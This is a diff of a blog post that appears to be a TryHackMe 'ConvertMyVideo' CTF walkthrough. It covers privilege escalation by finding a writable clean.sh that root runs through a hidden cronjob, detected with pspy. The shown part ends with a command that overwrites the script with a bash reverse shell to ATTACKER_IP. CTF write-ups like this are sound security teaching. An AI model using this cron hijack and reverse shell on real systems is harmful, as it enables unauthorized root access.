nisforrnicholas/nisforrnicholas.github.io/tryhackme/_posts/2021-12-10-convertmyvideo.md

 Now that we're in, let's find a way to escalate our privileges.

-Doing some digging around the filesystem, I found an interesting file called **clean.sh** in **/var/www/html/tmp**:
+Doing some digging around the filesystem, I found an interesting file called **clean.sh** in /var/www/html/tmp:

 ![screenshot17](../assets/images/convertmyvideo/screenshot17.png)

-This file is owned by **www-data** and is also writable.
+This file is owned by www-data (us) and is also writable.
 Let's look at the contents:

 ![screenshot18](../assets/images/convertmyvideo/screenshot18.png)

 Just a simple `rm` command...

-From my past experiences with CTF challenges, these sort of 'clean-up' scripts are normally run periodically as a **cronjob**.
+From my past experiences with CTF challenges, these sort of 'clean-up' scripts are normally run periodically as a cronjob.
 Let's check **/etc/crontab** to see if clean.sh is being run as a cronjob:

 ![screenshot19](../assets/images/convertmyvideo/screenshot19.png)

-Nothing here...
+Nothing here.

 With that said, it is possible to set up cronjobs without including them in the /etc/crontab file.
 Hence, let's use a nifty tool called [pspy](https://github.com/DominicBreuker/pspy/blob/master/README.md) to see if this is the case. `pspy` allows us to snoop on processes without the need for root permissions.

 ![screenshot20](../assets/images/convertmyvideo/screenshot20.png)

-Sure enough, after a minute has passed, we see that the **clean.sh** was indeed run!
-Furthermore, it was run by user with UID=0, aka **root**!
+Sure enough, after a minute has passed, we see that clean.sh was indeed run!
+Furthermore, it was run by user with UID=0, aka root!

-Since clean.sh is writeable by us, all we have to do is replace it with a **reverse shell script**:
+Since clean.sh is writeable by us, all we have to do is replace it with a reverse shell script:

 ```
 echo 'bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1' > clean.sh